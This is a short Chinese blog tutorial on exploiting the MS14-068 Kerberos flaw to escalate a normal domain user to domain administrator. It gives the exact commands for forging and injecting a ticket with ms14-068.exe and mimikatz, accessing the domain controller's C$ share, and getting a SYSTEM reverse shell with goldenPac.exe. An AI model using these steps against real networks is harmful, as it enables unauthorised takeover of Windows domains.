ms14-068漏洞
目錄- ms14-068漏洞
- 一、ms14-068漏洞介紹
- 二、ms14-068漏洞利用條件
- 三、ms14-068漏洞利用步驟
- 四、利用goldenPac.exe工具
一、ms14-068漏洞介紹
ms14-068漏洞主要通過偽造域管的TGT,將普通用戶權限提權為域管權限,以此來控制域控,只要服務器未打ms14-068補丁(KB3011780),在server 2000以上的域控服務器中,都可進行利用,
二、ms14-068漏洞利用條件
1、獲取域普通用戶的賬號密碼
2、獲取域普通用戶的sid
3、服務器未打KB3011780補丁
三、ms14-068漏洞利用步驟
1、查看域用戶的SID
whoami /all
2、清除記憶體中的票據
klist purge
3、通過ms14-068.exe生成票據
ms14-068.exe -u 域用戶@域名 -p 域用戶密碼 -s 域用戶SID -d 域控
4、匯入票據到記憶體
kerberos::ptc 票據名字
5、測驗是否成功(注意是機器名不是IP)
dir \\dc.candada.com\c$
6、可配合計劃任務、服務或者PsExec工具上線
四、利用goldenPac.exe工具
它是MS14-068+psexec的組合,因此使用起來非常放方便快捷,一條命令可拿到system權限,
利用:
goldenPac.exe 域名/域用戶名:域用戶明文密碼@域控完整域名
條件:
1、獲取域普通用戶的賬號密碼
2、獲取域普通用戶的sid
3、服務器未打KB3011780補丁
4、需要遠程桌面(使用這個工具,運行了一條命令后,如果成功則會拿到一共反彈shell,CS沒法用)
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/554909.html
標籤:其他
下一篇:返回列表